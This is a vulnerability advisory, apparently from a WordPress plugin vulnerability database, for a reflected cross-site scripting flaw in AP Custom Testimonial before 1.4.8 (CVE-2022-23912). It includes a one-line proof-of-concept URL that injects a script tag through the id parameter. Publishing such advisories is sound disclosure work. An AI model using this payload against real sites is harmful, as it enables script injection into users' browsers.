WordPress Plugin Vulnerabilities

AP Custom Testimonial < 1.4.8 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the id parameter before outputting it back in an attribute, leading to a Reflected cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin.php?page=apct_testimonial_edit&id=1"><script>alert(/XSS/)</script>

Affects Plugins

Plugin icon
ap-custom-testimonial
Fixed in 1.4.8

References

CVE
CVE-2022-23912
URL
https://plugins.trac.wordpress.org/changeset/2664185

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Rafael Castilho
Submitter
Rafael Castilho
Submitter website
https://castilho101.github.io
Submitter twitter
castilho101
Verified
Yes
WPVDB ID
09512431-aa33-4514-8b20-1963c5d89f33

Timeline

Publicly Published
2022-01-25 (about 2 years ago)
Added
2022-01-25 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other

Published
Title
Published
2013-10-08
Title
Quick Contact Form 6.0 - Stored XSS
Published
2021-09-27
Title
WP Visited Countries Reloaded < 3.1.1 - Reflected Cross-Site Scripting
Published
2014-08-01
Title
WooCommerce SagePay Direct Payment Gateway 0.1.6.6 - pages/3DCallBack.php Multiple Parameter Reflected XSS
Published
2022-05-02
Title
Tabs Responsive < 2.2.8 - Editor+ Stored Cross-Site Scripting
Published
2021-10-05
Title
Simple Download Monitor < 3.9.5 - Reflected Cross-Site Scripting